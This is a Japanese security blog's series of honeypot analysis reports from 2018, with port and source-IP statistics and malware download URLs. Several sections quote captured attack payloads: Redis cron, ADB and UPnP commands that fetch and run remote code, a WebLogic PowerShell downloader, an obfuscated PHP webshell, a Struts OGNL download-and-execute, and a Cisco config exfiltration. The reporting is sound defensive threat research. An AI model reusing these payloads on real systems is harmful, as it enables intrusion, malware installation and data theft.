sec-chick Blog

サイバーセキュリティブログ

ハニーポット月次分析 9月度〜EthereumとRedis〜

かなり遅くなってしまいましたが、9月に検知した通信のまとめ記事です。

9月度のHoneytrapのデータを纏めました。Ethereum関連の通信が一時的に増加、Redisに対する攻撃が印象的でした。

<Honeytrapでの検知数>
9/9ごろの増加傾向はEthereum関連が増加したことが原因となっています。
複数ポートへの通信が発生した際に増加しますが、毎日複数ポートへの通信が発生していないため、検知数がまばらになっています。

f:id:one-chick-sec:20181014021619p:plain





<宛先ポート別(円グラフ)>
それぞれの検知したポート宛で特に検知数が多かったものをサンプルとしていくつか記載しています。IoT製品および主要ポート(445,22など)が検知数としては多かった結果となりました。


※割合が0.5%以上のものがポート番号として表示
  80ポートは除外
f:id:one-chick-sec:20181013143755p:plain

<443ポート>
調査行為相当の通信が大半で明確に攻撃を狙ったものは確認できませんでした。
◾️通信内容
.....SMBr.....S...................@..b..PC NETWORK PROGRAM 1.0..LANMAN1.0..Windows for Workgroups 3.1a..LM1.2X002..LANMAN2.1..NT LM 0.12.

<8545>
Ethereum関連の通信で9/8-9/17に大量検知したもので、id部分を変えて送信しているものがほとんどでした。
◾️通信内容
POST / HTTP/1.1
Host: xxx.xx.xxx.xxx:8545
User-Agent: Go-http-client/1.1

{"jsonrpc":"2.0","method":"eth_blockNumber","params":null,"id":30}


<ポート 22>
SSHの調査行為相当の通信を検知していました。
◾️通信内容
SSH-2.0-libssh2_1.4.3..

<ポート 1433>
ポート 1433 (Microsoft SQL Server)への通信で、特に攻撃を狙ったものはありませんでした。

◾️通信内容
...)............................U........

<ポート 5739>
Cookieにユーザ名をセットして、RDP経由で不正ログインを狙った通信と思われます。
◾️通信内容
...+&......Cookie: mstshash=hello..........

<ポート 3389>
Cookieにユーザ名をセットして、RDP経由で不正ログインを狙った通信と思われます。
◾️通信内容
...+&......Cookie: mstshash=hello..........

<ポート52869>
IoT製品を狙った攻撃を多く検知していました。
◾️通信内容
POST /picsdesc.xml HTTP/1.1
Host: xxx.xx.xxx.xx:52869
User-Agent: python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.2.1.el6.x86_64
Connection: keep-alive
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /tmp/;wget http://xxx.xxx.xx.xx/elf.mips -O elf`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope> 331

<ポート 8080>
アクセス可能かどうかの調査行為の通信を検知していました。
◾️通信内容
GET / HTTP/1.1
Host: xxx.xx.xxx.xxx:8080

<ポート 81>
GoAhead Web Server をターゲットにした Server ヘッダの確認と思われます。サーバヘッダが一致していた場合、攻撃を継続する動作するとの報告もあります。
参考:IIJ Security Diary: Hajime ボットの観測状況


◾️通信内容
GET login.cgi HTTP/1.1

<ポート 6379>
Redisに対する攻撃を検知していました。
pastebinにスクリプトが記載されており、最終的にCoinMinerをダウンロードしてくるものと思われます。
◾️通信内容
set backuprd "\n*/1 * * * * root (curl -fsSL hxxps://pastebin[.]com/raw/5bjpjvLP||wget -q -O- hxxps://pastebin[.]com/raw/5bjpjvLP)|sh\n"..config set dir /etc/cron.d..config set dbfilename root..save..

<ポート 5555>
Android端末のコマンドラインツールADBを狙った通信。
Virustotal上ではmirai関連のマルウェアと判定されています。
◾️通信内容
CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://188[.]209[.]52[.]142/w -O -> w; sh w; rm w; curl http://188[.]209[.]52[.]142/c > c; sh c; rm c./

f:id:one-chick-sec:20181013144037p:plain

 
<攻撃元別IP>
攻撃元IPで検知数を纏めた結果、Ethereum関連を除くと主にcookieにセットして不正ログインを狙っている通信がほとんどでした。ツールを回して攻撃自体も簡単であり、成功時のリターンが大きいため、検知が多いのではないかと思います。
また、ヨーロッパやロシアからの攻撃が多く、アジアからの攻撃はほとんどありませんでした。

攻撃元IP

検知数 内容
46[.]166[.]148[.]196  オランダ 27430 ・ポート 8545宛への通信
・Ethereum関連の通信で9/8-9/17に大量検知
・詳細は 34-38日目:9/11-9/15 を参照
185[.]209[.]0[.]10 ラトビア 4455 ・複数ポートへの通信を検知
・通信内容は Cookie: mstshash=Administr
cookie にセットすることで不正ログインを狙っている
193[.]238[.]46[.]113 ロシア 3622 ・複数ポートへの通信を検知
・通信内容は Cookie: mstshash=Administr
cookie にセットすることで不正ログインを狙っている
77[.]72[.]83[.]48 イギリス 3457 ・複数ポートへの通信を検知
・通信内容は Cookie: mstshash=Administr
cookie にセットすることで不正ログインを狙っている
185[.]70[.]184[.]20 オランダ 3413 ・5739ポート宛への通信
・通信内容は Cookie: mstshash=hello
cookie にセットすることで不正ログインを狙っている
163[.]172[.]74[.]24 フランス 3054 ・複数ポートへの通信を検知
・通信内容は Cookie: mstshash=Administr
cookie にセットすることで不正ログインを狙っている
109[.]248[.]9[.]5 イギリス 2747 ・複数ポートへの通信を検知
・通信内容は Cookie: mstshash=hello
cookie にセットすることで不正ログインを狙っている
185[.]156[.]177[.]24 ロシア 2404 ・複数ポートへの通信を検知
・通信内容は Cookie: mstshash=Administr
cookie にセットすることで不正ログインを狙っている
103[.]53[.]224[.]95 香港 2107 ・複数ポートへの通信を検知
・通信内容は Cookie: mstshash=Administr
cookie にセットすることで不正ログインを狙っている
51[.]15[.]16[.]127 オランダ 1735 ・ポート 1433 (Microsoft SQL Server)への通信
・調査行為止まりであり、攻撃性はなし


以上、9月度の分析結果となります。

ハニーポット簡易分析(63-67日目:10/9-10/13)

Honeytrap の簡易分析 63-67日目になります。

Honeytrap簡易分析結果

<検知数(80ポートを除く)>

f:id:one-chick-sec:20181014115325p:plain

10/9ごろより、検知数が増加しています。検知数の増加は以下のIPからの通信が増加したためでした。

IP 検知数 割合
195[.]19[.]10[.]195 77,444 37.80%
62[.]76[.]75[.]210 42,943 20.96%
195[.]19[.]10[.]194 32,333 15.78%

いずれもロシアからの通信であり、通信内容は「Cookie: mstshash=Test」であり、調査行為相当の通信と思われます。AbuseIPDBでも報告が上がっており、特にターゲットを絞らずに攻撃していると思われます。

<宛先ポート別検知数 TOP10>
 ※80ポートを除く
2018/10/9 19,929件

宛先ポート 検知数 割合(%) サービス
445 3,027 15.19% SMB
113 506 2.54% auth/IDENT
8443 156 0.78% ?
3389 124 0.62% RDP
52869 103 0.52% D-Link, Realtek SDK
443 100 0.50% HTTPS
8080 94 0.47% PROCY
8008 81 0.41% ?
9001 76 0.38% ?
8000 72 0.36% ?

2018/10/10 6,450件

宛先ポート 検知数 割合(%) サービス
445 2,853 44.23% SMB
81 697 10.81% GoAhead Web Server 
4022 221 3.43% ?
9022 220 3.41% ?
8022 118 1.83% ?
222 116 1.80% SSH
2222 105 1.63% SSH
22 104 1.61% SSH
52869 94 1.46% D-Link, Realtek SDK
1433 70 1.09% Microsoft SQL Server

2018/10/11 19,939件

宛先ポート 検知数 割合(%) サービス
445 2,984 14.97% SMB
81 1,850 9.28% GoAhead Web Server 
22 644 3.23% SSH
8022 91 0.46% ?
222 88 0.44% SSH
3389 82 0.41% RDP
2222 71 0.36% SSH
10001 63 0.32% ?
1433 50 0.25% Microsoft SQL Server
8080 44 0.22% PROCY

2018/10/12 98,209件

宛先ポート 検知数 割合(%) サービス
445 2,742 2.79% SMB
81 1,931 1.97% GoAhead Web Server 
3389 82 0.08% RDP
2222 71 0.07% SSH
222 69 0.07% SSH
102 64 0.07% iso-tsap
22 58 0.06% SSH
8022 57 0.06% ?
1433 54 0.06% Microsoft SQL Server
8080 50 0.05% PROCY

2018/10/13 63,547件

宛先ポート 検知数 割合(%) サービス
445 2,835 4.46% SMB
502 97 0.15% Modbus Protocol
81 68 0.11% GoAhead Web Server 
3389 63 0.10% RDP
1433 51 0.08% Microsoft SQL Server
6379 35 0.06% ?
123 32 0.05% NTP
2082 32 0.05% ?
49 32 0.05% TACACS
4991 32 0.05% VITA Radio Transport


<ポート 81宛ての通信>
特定のIPからGoAhead Web Server  が存在するかの調査行為の通信を大量に検知していました。内容はGETリクエストのみであるため、攻撃性はありませんでした。

リクエスト内容:
GET / HTTP/1.1 

該当IP
※割合は81ポート宛てのみの割合

IP 検知数 割合
58[.]39[.]124[.]19 3,629 63.67%
150[.]249[.]168[.]234 1,304 22.88%


以上、簡易分析となります。

ハニーポット簡易分析(53-62日目:10/1-10/8)

長らく更新が止まってしまいましたが、10/1-10/9までのHoneytrapの簡易分析の結果です。

<宛先ポートごとの割合(80ポートを除く)>

f:id:one-chick-sec:20181009185633p:plain

<宛先ポートごとの検知数(80ポートを除く)>
※割合が0.5%以上

宛先ポート

検知数 割合(%) サービス
445 17843 45.3997 SMB
81 1082 2.75304 GoAhead Web Server 
22 1029 2.61819 SSH
3389 700 1.78108 RDP
1433 460 1.17042 Microsoft SQL Server
52869 366 0.93125 D-Link, Realtek SDK
502 359 0.91344 ?
8080 329 0.83711 PROCY
5555 234 0.59539 Android Debug Bridge
8222 221 0.56231 ?
6379 206 0.52415 Redis
8545 201 0.51142 Ethereum

 

<ポート 81>
◾️リクエス
GET / HTTP/1.1
Authorization: Basic YWRtaW46M2VkYzRyZnY=


◾️検知内容
Basic認証に関するリクエストで主にユーザー名:adminに対する総当たり攻撃でした。ここの集計はSplunkのサーチ文で抜き出しています。
<参考:利用したサーチ文>
※SplunkのApps DECRYPT が必要となります。
  また、Honeytrapのログはjson形式で取り込んでいます。

| decrypt field="attack_connection.payload.data_hex" unhex emit('attack_connection.payload.data_decrypted')
| rex field="attack_connection.payload.data_decrypted" "Authorization\: Basic(?<Authorizationt_honeytrap>.+?)\."
| decrypt field="Authorizationt_honeytrap" atob emit('Authorizationt_honeytrap_decode')

<ポート 8545>
◾️リクエス
POST / HTTP/1.1
User-Agent: EtherRpcWrapper v0.1

{"version": "1.1", "params": [], "method": "eth_blockNumber", "id": 1}..

◾️検知内容
Ethereumに関する通信で一時に比べるとかなり減少しましたが、未だに継続して検知しています。

<ポート 7001>
◾️リクエス
POST /wls-wsat/CoordinatorPortType HTTP/1.1
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
~省略~
<string>Start PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACAAJABPAFMAIgApADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADIAMQAuADEANwAuADIAOAAuADEANQAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
~省略~

◾️検知内容

WebLogic の WLS Security に対するコマンド実行(CVE-2017-10271)を狙った通信でPowerShellで難読化しています。難読化を解除すると以下の内容となります。
 → $OS=(Get-WmiObject Win32_OperatingSystem)Caption;$WC=New-Object NetWebClient;$WCHeadersAdd('User-Agent',"PowerShell/WL $OS");IEX $WCDownloadString('hxxp://121[.]17[.]28.[.]15/images/test/DLphp');

この宛先への通信はVTでは特にウイルス判定はないものの、Google先生ではいくつかヒットする内容となっています。おそらく、脆弱性があった場合に特定のURLへアクセスするだけの調査行為の通信と思われます。

ダウンロードURL 検知数 新規 VT
hxxp://104[.]248[.]189[.]214/tenshimips[.]mips 28   https://www.virustotal.com/#/url/cdb167260bf09c1b74b5fb932fd1647ba437f9b72a33317dc7ed81167beeed1e/detection
hxxp://107[.]191[.]99[.]230/elf[.]mips 132   https://www.virustotal.com/#/file/5d72f22d6c387664b23cf4ea3080673885b73a9bea5caff7eb84fd3d0fd1a00b/detection
hxxp://159[.]89[.]229[.]38/yakuza[.]mips 2 https://www.virustotal.com/#/file/d1950c7cced0825f6e9872d9b507467f7d1ca0c07a3e52e3b59ee756d301356b/detection
hxxp://185[.]162[.]130[.]187/adbs2 1   https://www.virustotal.com/ja/url/a2784a34beaea3d7dc9f3099fc03f4c56446a5116577281e6142b445a4ad2003/analysis/
hxxp://185[.]61[.]138[.]151/NA39XX 1
Tsunami
https://www.virustotal.com/#/file/ee7ba15bae03a8095e0bf432a2f2674f2e78085258f64c137d2ad22bd96815a7/detection
hxxp://188[.]209[.]52[.]142/c 132   https://www.virustotal.com/#/url/8a392244d6648ac3fed7dcb98c79a24f89a5f6602ad007d2026e2cbf951547a8/detection
hxxp://198[.]199[.]66[.]110/Josho[.]mips 9 https://www.virustotal.com/#/url/94e8ea5c694acfbe030f4d59a8c84d399dcb1cf6166bf2f6ef023439beb99a8a/detection
hxxp://207[.]148[.]78[.]152/bc 1   https://www.virustotal.com/ja/url/c98d33aea5b9d6bbfc6db731d38ebdb16dfbaf65cb1896a628a0683f94b2b178/analysis/
hxxp://212[.]237[.]32[.]62/mips 1   https://www.virustotal.com/#/file/40e606c1d09c76d4681d3c745bf5dc261559b241c78ed9cb7baa59e6dcbb44ff/detection
hxxp://27[.]102[.]115[.]44/adbs2 1   https://www.virustotal.com/ja/url/62fbd6898d5bd0adae9f5ad713b37f267d5b22c1b4b1ef564bcfa712f0fcf9b0/analysis/
hxxp://68[.]183[.]28[.]29/lawl 5 https://www.virustotal.com/#/url/7465c16f42cabe6620e580d9320b4f2ff15210a3e9001fc6e11bacf0b38be26b/detection
hxxp://76[.]74[.]177[.]230/oxy[.]mips 18 https://www.virustotal.com/#/url/4c38868f00090b372fe7b79a095f884d087d67a061ad15d161b1d9cdf324cc0c/detection
hxxp://76[.]74[.]177[.]230/seraph[.]mips 108
Mirai

https://www.virustotal.com/#/file/9296d11e4d72e95d21dc5bc395c5c3103fb2c467e200f180c10bab3dfe1df856/detection

主にMirai系のマルウェアがほとんどですが、yakuzaなどの日本語と思えるマルウェア名も検知していました。VTで確認する限り、明確にはmirai系と言い切れない結果であり、傾向が変化しているかもしれません。

以上、簡易分析となります。


ハニーポット簡易分析(52日目:9/30)

9/30 日分の検知ログとなりますが、今回は新規の検知がほとんどなく、補足で説明することもないような平和な検知状況でした。

9/30 5,099件 (Honeytrap)
◾️宛先ポート別(80ポートを除く)

ポート 件数 割合 サービス
445 1,382 27.10% SMB
3389 381 7.47% RDP
22 156 3.06% SSH
222 93 1.82% SSH
6379 91 1.79% Redis
2222 83 1.63% SSH
8022 76 1.49% ?
81 71 1.39% GoAhead Web Server 
1433 65 1.28% Microsoft SQL Server
52869 63 1.24% D-Link, Realtek SDK


◾️マルウェアダウンロード先

宛先ポート マルウェアURL 検知数 VT
5555 hxxp://185[.]162[.]130[.]187/adbs2 1 https://www.virustotal.com/ja/url/a2784a34beaea3d7dc9f3099fc03f4c56446a5116577281e6142b445a4ad2003/analysis/
5555 hxxp://188[.]209[.]52[.]142/c 34 https://www.virustotal.com/#/url/8a392244d6648ac3fed7dcb98c79a24f89a5f6602ad007d2026e2cbf951547a8/detection
5555 hxxp://95[.]215[.]62[.]169/adbs 2 https://www.virustotal.com/ja/url/d3c48b0b640ab29a353400425a1fa2e02a39983ea20c6ab70f67047d7013fcd5/analysis/
52869 hxxp://104[.]248[.]189[.]214/tenshimips[.]mips 33 https://www.virustotal.com/#/url/cdb167260bf09c1b74b5fb932fd1647ba437f9b72a33317dc7ed81167beeed1e/detection
52869 hxxp://107[.]191[.]99[.]230/elf[.]mips 19 https://www.virustotal.com/#/file/5d72f22d6c387664b23cf4ea3080673885b73a9bea5caff7eb84fd3d0fd1a00b/detection
52869 hxxp://194[.]182[.]65[.]56/bins/apep[.]mips 1 https://www.virustotal.com/#/file/a0925fc32573e5f4edfbf4d321ebd9813f3f598c22d8e23105d1b3ab33c0cc1a/detection


◾️WoWHoneypotの検知状況

Method path 検知数
GET / 33
GET /.git/HEAD 3
GET /?XDEBUG_SESSION_START=phpstorm 1
GET /HNAP1/ 1
GET /cmx.php?cmd=echo "<?php \$func='c'.'r'.'e'.'a'.'t'.'e'.'_'.'f'.'u'.'n'.'c'.'t'.'i'.'o'.'n';\$test=\$func('\$x','e'.'v'.'a'.'l'.'(b'.'a'.'s'.'e'.'6'.'4'.'_'.'d'.'e'.'c'.'o'.'d'.'e(\$x));');\$test('QHNlc3Npb25fc3RhcnQoKTtpZihpc3NldCgkX1BPU1RbJ2NvZGUnXSkpeyhzdWJzdHIoc2hhMShtZDUoQCRfUE9TVFsnYSddKSksMzYpPT0nMjIyZicpJiYkX1NFU1NJT05bJ3RoZUNvZGUnXT10cmltKCRfUE9TVFsnY29kZSddKTt9aWYoaXNzZXQoJF9TRVNTSU9OWyd0aGVDb2RlJ10pKXtAZXZhbChiYXNlNjRfZGVjb2RlKCRfU0VTU0lPTlsndGhlQ29kZSddKSk7fQ=='); ?>" >images.php & echo Hello, Peppa! 1
GET /console 3
GET /phpMyAdmin-3.0.1.1/scripts/setup.php 13
GET /phpMyAdmin/scripts/setup.php 3
GET /phpmyadmin/scripts/setup.php 3
GET /phpmyadmin3/scripts/setup.php 12
GET /pma/scripts/setup.php 3
GET /rgs.mng 1
GET /scripts/setup.php 3
GET /web/cgi-bin/hi3510/param.cgi?cmd=getp2pattr&cmd=getuserattr 1
GET http://112.35.88.28:10083/index.php 1
HEAD / 1
HEAD /static/admin/images/login_logo.png 4
POST /cmx.php 1
POST /images.php 1
POST

hxxp://check.proxyradar.com/azenv.php?auth=153823774681&a=PSCN&i=2685440439&p=80

1

 

以上、簡易分析となります。

ハニーポット簡易分析(43-51日目:9/20-9/29)

かなり更新が止まってしまいましたが、Honeytrap の簡易分析となります。

ポート別に見てみると、445ポート宛の通信が非常に多い割合です。通信内容としては調査行為止まりですが、未だに攻撃に利用されているポートの一つとなっています。
ポート22, 3389,8080の主要ポートに続き、IoT製品を狙ったポート52869(D-Linkなど)も多く観測されています。

◾️9/20 - 9/29 における宛先別ポート(80ポートを除く)

f:id:one-chick-sec:20180930191925p:plain

◾️宛先ポート別の割合

9/20 3,882 件

ポート 件数 割合 サービス
445 1,814 46.73% SMB
22 152 3.92% SSH
3389 121 3.12% RDP
1433 73 1.88% Microsoft SQL Server
5555 54 1.39% Android Debug Bridge
8080 41 1.06% PROXY
6379 38 0.98% Redis
4567 33 0.85% ?
1194 30 0.77% OpenVPN
995 30 0.77% POP3-SSL

9/21 4,258 件

ポート 件数 割合 サービス
445 1,795 42.16% SMB
22 213 5.00% SSH
8080 121 2.84% PROXY
6379 91 2.14% Redis
3389 82 1.93% RDP
2222 66 1.55% SSH
1433 63 1.48% Microsoft SQL Server
8180 49 1.15% ?
8081 38 0.89% ?
9200 34 0.80% WSP

9/22 4,234 件

ポート 件数 割合 サービス
445 1,637 38.66% SMB
22 148 3.50% SSH
22222 117 2.76% SSH
8180 66 1.56% ?
8080 64 1.51% PROXY
1962 63 1.49% BIAP-MP
3389 59 1.39% RDP
1433 54 1.28% Microsoft SQL Server
47808 37 0.87% bacnet
81 37 0.87% GoAhead Web Server 

9/23 5,555 件

ポート 件数 割合 サービス
445 1,648 29.67% SMB
22 1,352 24.34% SSH
3389 99 1.78% RDP
1433 83 1.49% Microsoft SQL Server
8080 66 1.19% PROXY
10022 64 1.15% ?
5000 63 1.13% UPnP
52869 42 0.76% D-Link, Realtek SDK
2323 33 0.59% TELNET
28017 33 0.59% ?

9/24 5,120 件

ポート 件数 割合 サービス
445 1,688 32.97% SMB
22 197 3.85% SSH
2222 72 1.41% SSH
3389 69 1.35% RDP
11022 64 1.25% ?
1433 55 1.07% Microsoft SQL Server
52869 43 0.84% D-Link, Realtek SDK
8080 40 0.78% PROXY
4899 35 0.68% ?
5555 33 0.64% Android Debug Bridge

9/25 5,864 件

ポート 件数 割合 サービス
445 1,839 31.36% SMB
22 1,460 24.90% SSH
3389 99 1.69% RDP
222 88 1.50% rsh-spx
8022 72 1.23% ?
1433 67 1.14% Microsoft SQL Server
2222 58 0.99% SSH
8080 55 0.94% PROXY
5555 47 0.80% Android Debug Bridge
52869 34 0.58% D-Link, Realtek SDK

9/26 4,475 件

ポート 件数 割合 サービス
445 1,858 41.52% SMB
503 192 4.29% intrinsa
3389 85 1.90% RDP
22 80 1.79% SSH
6379 70 1.56% Redis
2202 64 1.43% SSH
11022 64 1.43% ?
1433 63 1.41% Microsoft SQL Server
2222 39 0.87% SSH
8087 33 0.74% ?

9/27 4,241件

ポート 件数 割合 サービス
445 1,857 43.79% SMB
33789 464 10.94% ?
22 162 3.82% SSH
222 96 2.26% SSH
8022 95 2.24% ?
2222 89 2.10% SSH
3389 61 1.44% RDP
1433 45 1.06% Microsoft SQL Server
6379 43 1.01% Redis
52869 40 0.94% D-Link, Realtek SDK

9/28 5,569件

ポート 件数 割合 サービス
445 1,773 31.84% SMB
2202 218 3.91% SSH
22 119 2.14% SSH
3389 96 1.72% RDP
8022 81 1.45% ?
2222 72 1.29% SSH
6379 62 1.11% Redis
222 57 1.02% SSH
52869 57 1.02% D-Link, Realtek SDK
8080 54 0.97% PROXY

9/29 7,976件

ポート 件数 割合 サービス
445 1,656 20.76% SMB
6379 271 3.40% Redis
22 188 2.36% SSH
3389 137 1.72% RDP
2222 129 1.62% SSH
222 102 1.28% SSH
8022 90 1.13% ?
8080 86 1.08% PROXY
1433 64 0.80% Microsoft SQL Server
8834 34 0.43% ?


◾️マルウェアダウンロード先
マルウェアについては傾向は大きく変更はありませんでした。いくつか解析していないURLもあることから、攻撃者側もダウンロード先を変更しているように思われます。

マルウェアURL 検知数 VT
hxxp://188[.]209[.]52[.]142/c 281 https://www.virustotal.com/#/url/8a392244d6648ac3fed7dcb98c79a24f89a5f6602ad007d2026e2cbf951547a8/detection
hxxp://27[.]102[.]115[.]44/adbs2 2 https://www.virustotal.com/ja/url/62fbd6898d5bd0adae9f5ad713b37f267d5b22c1b4b1ef564bcfa712f0fcf9b0/analysis/
hxxp://185[.]162[.]130[.]187/adbs2 1 https://www.virustotal.com/ja/url/a2784a34beaea3d7dc9f3099fc03f4c56446a5116577281e6142b445a4ad2003/analysis/
hxxp://104[.]248[.]176[.]11/sora[.]mips 4 https://www.virustotal.com/#/url/af74305b9f2f5f0fd8aa96f1c9a0dc9158136a4ba3161aea5f5caf69584e99a1/detection
hxxp://104[.]248[.]189[.]214/oxy[.]mips 10 https://www.virustotal.com/#/url/a119aa0f781bc7a3ea745c0068ca9215c0468fc65c40a77ae1d1a2af1198a8b7/detection
hxxp://104[.]248[.]189[.]214/tenshimips[.]mips 72 https://www.virustotal.com/#/url/cdb167260bf09c1b74b5fb932fd1647ba437f9b72a33317dc7ed81167beeed1e/detection
hxxp://107[.]161[.]31[.]20/tenshimips 46 https://www.virustotal.com/#/file/6222453c1c8e5c19425a6b75519210eae830e36ebcccc0d5882b9c14944593f3/detection
hxxp://107[.]174[.]26[.]53/oxy[.]mips 3 https://www.virustotal.com/#/url/e166a58b66ca2d5a61270f7007ed3f490aa8a010d04a6bab18029344ae3eae27/detection
hxxp://107[.]191[.]99[.]230/elf[.]mips 178 https://www.virustotal.com/#/file/5d72f22d6c387664b23cf4ea3080673885b73a9bea5caff7eb84fd3d0fd1a00b/detection
hxxp://107[.]191[.]99[.]41/elf[.]mips 331 https://www.virustotal.com/ja/file/c5dff296b4f8a176223082527cd58402df2a7e5bcf4414f961d5312530ed5ee6/analysis/1533020160/
hxxp://107[.]191[.]99[.]41/loli[.]lol[.]mips 1 https://www.virustotal.com/#/url/4cbbb8f2e85cfae858432a6692d01e01ce371c1bf4c40020baab01af6262cd9a/detection
hxxp://138[.]68[.]21[.]15/oxy[.]mips 2 https://www.virustotal.com/ja/url/b038342e9944b9db2b39dbfbce5c3b9fa4a522da9c8776bd85126d8e5532b418/analysis/1536
hxxp://138[.]68[.]21[.]15/tenshimips[.]mips 40 https://www.virustotal.com/ja/url/292e92d9b0a7495a33059011aa8a6729555f0abf40d8f9f986d0c689ba30fcec/analysis/
hxxp://138[.]68[.]240[.]213/tenshimips[.]mips 12 https://www.virustotal.com/ja/url/63e8fb14fe791f7d992bb77e73668f6b5487b0a0f0079ede6630cf788c9f3b7b/analysis/1536416627/
hxxp://146[.]185[.]253[.]127/keiji[.]mips 19 https://www.virustotal.com/#/file/708f5e3b9c7e0b91f116b7c15c7f6f0a11499867afc2843ff4b890feae8e750a/detection
hxxp://148[.]72[.]176[.]78/ngynx 7 https://www.virustotal.com/ja/url/b1a443e356740dcec35cb29bff76f8dcc834c268f9215d557bcd8cc57aa38c5b/analysis/
hxxp://167[.]88[.]117[.]178/kratos[.]mips 3 https://www.virustotal.com/#/file/f8bda8dd8ce8538cff98edb2cf7ef2a64f4a6b96e9dba1ed41a1bfb212d31851/detection
hxxp://167[.]99[.]171[.]249/hoho[.]mips 9 https://www.virustotal.com/#/url/8cc93d7feb2ed36620aa8c93d0cb4b548f00dde4c9dfddbb5c0790334e53f33b/detection
hxxp://176[.]32[.]33[.]165/mips 3 https://www.virustotal.com/#/file/2a5336e77002a6ebbaa51206cb7a1142463b80bd1299b5a6635c1d3bd1533711/detection
hxxp://176[.]32[.]33[.]171/kenjiro[.]mips 2 https://www.virustotal.com/ja/file/3eb6c453b75d71ce7bacd402ef86674616e6cf3237e155972e7940c9bb119b04/analysis/1535397999/
hxxp://185[.]10[.]68[.]127/rtbin 20 https://www.virustotal.com/ja/url/88391b0b3f2a711655750313557dc9cc13d2aa78a8741d5f395453164be5d7c4/analysis/
hxxp://185[.]162[.]130[.]187/adbs2 5 https://www.virustotal.com/ja/url/a2784a34beaea3d7dc9f3099fc03f4c56446a5116577281e6142b445a4ad2003/analysis/

<気になった通信>
Apache Struts 2 の脆弱性 (S2-045) を狙った通信ですが、かなり複雑なコマンドになっています。ダウンロードのファイルの詳細までは確認していませんが、IoT系のマルウェアやマイナー系のルールではないと思われます。

GET /struts2-rest-showcase/orders.xhtml
Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):*1.(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cmd /c del C:/Windows/temp/appveif.vbs&echo Set Post = CreateObject("Msxml2.XMLHTTP") >>C:/Windows/temp/appveif.vbs&echo Set Shell = CreateObject("Wscript.Shell") >>C:/Windows/temp/appveif.vbs&echo Post.Open "GET","hxxp://a46[.]bulehero[.]in/download[.]exe",0 >>C:/Windows/temp/appveif.vbs&echo Post.Send() >>C:/Windows/temp/appveif.vbs&echo Set aGet = CreateObject("ADODB.Stream") >>C:/Windows/temp/appveif.vbs&echo aGet.Mode = 3 >>C:/Windows/temp/appveif.vbs&echo aGet.Type = 1 >>C:/Windows/temp/appveif.vbs&echo aGet.Open() >>C:/Windows/temp/appveif.vbs&echo aGet.Write(Post.responseBody) >>C:/Windows/temp/appveif.vbs&echo aGet.SaveToFile "C:/Windows/temp/appveif.exe",2 >>C:/Windows/temp/appveif.vbs&echo wscript.sleep 10000>>C:/Windows/temp/appveif.vbs&echo Shell.Run ("C:/Windows/temp/appveif.exe")>>C:/Windows/temp/appveif.vbs&C:/Windows/temp/appveif.vbs').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

マルウェアURL先: https://www.virustotal.com/#/file/452fec0a680e9f11334e75a0ad8f7f2b837676f08303d935b5ad188f218dcd8b/detection

他にも気になる通信はあったので、ちょくちょくとブログに書いていこうと思います。

簡易分析は以上となります。

*1:#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class

ハニーポット簡易分析(40-42日目:9/17-9/19)

9/17-9/19 のHonetyrapにおける簡易分析となります。
9/17までは Ethereumに関する通信が多かったですが、9/18には数が激減しました。
それ以降は特に通信の傾向変化はありませんでした。

◾️4786に関する通信について
 検知数は多くないですが、Cisco Smart Install Client が使用する 4786/tcp ポートに対する攻撃を観測していました。TFTPサーバからコンフィグを読み込んで、設定するような通信と思われます。ただし、xxxの部分はこのサーバのIPであり、IPからの通信があるかの調査行為かもしれません。
ペイロード
copy flash:/config.text tftp://222[.]211[.]78[.]73/xxx.xx.xxx.xxx.conf
 

◾️宛先ポートごとの検知数(80ポートを除く)

9/17 6561件
宛先ポート 件数 割合 サービス
8545 1,811 27.60% Ethereum
445 1,769 26.96% SMB
22 360 5.49% SSH
52869 78 1.19% D-Link, Realtek SDK
1433 70 1.07% Microsoft SQL Server
22022 64 0.98% ?
6379 54 0.82% Redis
3389 49 0.75% RDP
81 38 0.58% GoAhead Web Server 
5555 36 0.55% Android Debug Bridge

